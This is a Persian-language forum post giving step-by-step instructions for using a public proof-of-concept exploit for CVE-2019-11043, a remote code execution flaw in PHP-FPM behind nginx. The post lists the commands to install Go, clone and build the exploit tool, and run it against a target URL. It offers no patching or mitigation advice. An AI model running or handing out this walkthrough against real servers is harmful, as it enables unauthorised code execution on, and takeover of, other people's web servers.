اکسپلویت CVE-2019-11043 PHP-FPM برای nginx

جمع کردن
X
 
  • زمان
  • نمایش
پاک کردن همه
پست‌های جدید
  • ground_master
    پیشکسوت

    • Feb 2017
    • 818

    #1

    اکسپلویت CVE-2019-11043 PHP-FPM برای nginx

    آسیب پذیری مورد نظر در ماژول PHP-FPM وجود دارد و با ایجاد زنجیره‌ای آن با سایر موارد می‌تواند به مهاجمان اجازه دهد از راه دور کد دلخواه را روی سرورهای آسیب پذیر اجرا کنند.

    در این پست به نحوه استفاده از اکسپلویت میپردازیم:

    به منظور استفاده از این آسیب پذیری، یک POC با زبان golang ایجاد شده است که در لینک زیر قابل دسترس است :

    کد:
      [LEFT][SIZE=14px][B][URL]https://github.com/neex/phuip-fpizdam[/URL][/B][/SIZE][/LEFT]
     [SIZE=14px][/SIZE]


    به منظور راه اندازی ابتدا با یکی از دستورات زیر golang را در سیستم عامل خود نصب نمایید :

    کد:
      [LEFT][SIZE=14px]apt-get install go
    
    yum install go[/SIZE]
    
    [/LEFT]
     [SIZE=14px][/SIZE]


    پس از دریافت پیغام نصب موفقیت آمیز با دستور git clone فایل های POC را دانلود نمایید :

    کد:
      [LEFT][SIZE=14px]git clone [B][URL]https://github.com/neex/phuip-fpizdam.git[/URL][/B][/SIZE]
    
    [/LEFT]
     [SIZE=14px][/SIZE]

    سپس با دستور cd به فولدر مربوطه رفته و دستور go build را اجرا نمیایید:

    کد:
      [LEFT][SIZE=14px]cd phuip-fpizdam[/SIZE]  
     [SIZE=14px]go build[/SIZE] [/LEFT]
     [SIZE=14px][/SIZE]

    برای مشاهده تصویر بزرگتر کلیک کنید

نام:	ngi.jpg
بازدیدها:	372
حجم:	67.7 کیلوبایت
شناسه:	17229



    حالا میتوانید با دستور phuip-fpizdam برنامه را اجرا نمایید:

    کد:
      [LEFT][SIZE=14px]phuip-fpizdam http://target.com/index.php [/SIZE][/LEFT]
     [SIZE=14px][/SIZE]



در حال کار...